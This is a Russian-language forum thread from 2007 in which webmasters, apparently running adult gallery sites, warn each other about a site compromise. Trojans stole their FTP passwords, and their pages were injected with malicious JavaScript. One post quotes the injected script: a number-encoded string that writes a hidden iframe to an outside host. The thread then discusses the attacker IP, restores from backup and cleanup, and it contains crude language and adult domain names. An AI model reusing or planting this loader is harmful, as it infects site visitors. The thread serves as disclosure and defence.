Овнерам и Постерам!!! Ахтунг!!!

С фрихов при загрузке выполняется Джава код грузит троян, который ворует пароли от ФТП

http://www.momsforyou.com/xxx/latina-milf/mom-mature/
http://www.lesbiansplanet.com/girls/perfect-smooth-bodies/lesbian-ass/

Цитата:

<!-- ~ --><SCRIPT LANGUAGE="JavaScript"> <!-- function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97! 109!101!32!115!114!99!61! 34!104!116!116!112!58!47!47! 115!115!115!55!46!105!110!102!111!47! 116!100!115!47!105!110!46!99!103!105!63!50! 34!32!119!105!100!116!104!61!34!49!34!32!104!101 !105!103!104!116!61!34!49!34!62!60!47!105!102! 114!97!109!101!62!";l=str.length;while(c<=str.length-1) {while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out);} //--> </SCRIPT><SCRIPT LANGUAGE="JavaScript"> <!-- Decode(); //--> </SCRIPT>

Без гандонов не входить, некоторые долго потом комп чистили, антивири его не видят

Владелец этого домена или не видит или мудак редкостный так как продолжает постить

Есть возможно еще фрихи

Последний раз редактировалось: Sergeyka (28/03/07 в 10:18), всего редактировалось 3 раз(а)

Sergeyka: еще вот эти два домена:

see-her-squirt.biz
beautylatinas.com

у меня улетели седня в бан

Вика спасибо, народ как лечить этого пидара не видят антивири его
Где сидит процесс что запускает файлы?

Файлы находяться в корне диска с

Взлом с 75.126.21.163
Овнеры этих доменов у нас все сидят. Уже пофиксили все.

когда вы пофиксили, сходи по линке

Блин, еще бы научили как лечиться теперь?

забавно сука эта хуета сама себя прописала в брэндмауэр виндоса типа разрешено с него урлы отправлять, вроде убил но не уверен, не нашел где сидит эта сука

hotsianbabes.com
lesbiansplanet.com
С этими доменами ситуация следующая.
Юзерами не были созданы бекапы, потому можно домены из листинга удалить, содержимое удаляется в данный момент под чистую, разбираться мне лень. Пароли сменены.
Овнерам
Ребята, приносим свои извинения, данная хрень почти сразу была обнаружена, мы бросили все и оперативно востановили все что смогли, не смотря на накрытый стол и ДР одного из коллег . В данный момент админы проверяют все что можно. Что вызывает подозрения сносим нафиг.
Банить постеров или не банить дело Ваше...
Спасибо за понимание, всю инфу буду постить по мере ее поступления.
Еще раз приношу свои извинения.

вот еще пара доменов:
http://www.onlychubbypics.com/bbw/heavy-breasted-beauty/nude-bbw/
http://www.hotsianbabes.com/asia/kinky-asian-teen/asian-woman/
что забавно - на старых фрихах ифрейма нет...

http://www.onlychubbypics.com/bbw/heavy-breasted-beauty/nude-bbw/
восстановлен из бекапа. Все в порядке. Или я не все вижу?
hotsianbabes.com хтмл.

да блин со многих сайтов грузится экзешник, дрочам думаю пофиг , они не заметят но что он делает на компе при автозапуске х.е.з

сенкс за инфу, так что теперь с этими доменами делать? сносить их из бд?

Ну так теперь всё нормально или как?

В данный момент удален контент полностью с доменов
hotsianbabes.com
lesbiansplanet.com
так как там не было сделано юзерами бекапов.
На всех остальных серверах все восстановлено из бекапов и в данный момент вообще выключен доступ по ФТП для всех пользователей от греха подальше. До момента выяснения каким образом ушли пароли я его открывать не буду никому .
Такая ситуация не у нас одних, всем нашим партнерам я стукнул в аську и уведомил о ситуации. Кто не получил мессагу из наших партнеров стучите мне я дам все разъяснения.

У меня тоже эта хрень, прошу овнеров не выкидывать из базы фрихи с доменов:
_sugaryteen.com/
_enamoure.com/
_wetoasis.com/
_exoticwish.com/
_exoticsea.com/
_ethnicisle.com/
_ethnic-hotel.com/
_ethnicangel.com/
_exoticflame.com/
_myethnicgirls.com/
_exotic-land.com/
_honeyfree.com/
_wetforest.com/

Сейчас разбираемся.

Последний раз редактировалось: eger (30/03/07 в 13:36), всего редактировалось 1 раз

а в чем уязвимость не определили еще? если тока html то нет опасений?

Дело не в серверах, дело в троянах на локале. Какие трояны угнали пароли пока выясняем. Вот я отписал
Взлом с 75.126.21.163
eger бро, удачно тебе восстановить все.

Те, кто фрихи проверял - проверьте свои хосты (индексные файлы)

кто-нибудь - если удастся вытащить вирь, отошлите производетелям антивирей.... а то чувствую это надолго все...

pierx писал:

Те, кто фрихи проверял - проверьте свои хосты (индексные файлы)

а что там должно быть ?


лучше проверьте C:/ , там файлы типа FKJGHT.exe
если фиревол не стоял значит ушла инфа о вас, каспер, нод сасут...

exe размером 24605 байт ищите. пока все кто писал такой размер говорят. Но это уже в результате взлома грузили, куда ушли пароли пока не ясно. Касперскому отправили файлы.

угу. тоже седня такой код на 1 фрихе видел

Сергейка, покоцай код пробелами - читать невозможно

ritor писал:

exe размером 24605 байт ищите. пока все кто писал такой размер говорят. Но это уже в результате взлома грузили, куда ушли пароли пока не ясно. Касперскому отправили файлы.

а откуда пароли уходят и какие имено ?

sexogen писал:

а откуда пароли уходят и какие имено ?

По моим данным и данных тех кто мне стучал в аську, ушли пароли к ФТП. Оффтопик: А скрипт с айпишника 75.126.21.163 ходил по доменам, ставил редирект, зачем то залил мне чужого файла, доров каких то. много перепутал. На все наши серчфиды тоже поставлен был редирект.
4 домена наших партнеров с 300К ТГП трафа и акками полностью на экспы редиректило ну и в таком духе, дедик с сиджами успели закрыть.
так вот по опросу почти все кто попал пароли хранили в клиентах ФТП. по наличию троянов щас все усиленно проверяются, но пока безрезультатно.

так есть ведь разные клиенты FTP , какой софт вы юзали , как конектились ? или где хранились пароли

каким браузером пользовались, версия.

нет смысла менять пароль если не установлен путь проникновения, угонят к ебеням повторно

ЗЫ
короче надо покупать корманый компутар специально для паролей
и к никаким сетям его не подрубать

зыы
и ставим софт http://www.dfservice.com/site-monitor/index.html.ru.htm для мониторинга сайтоф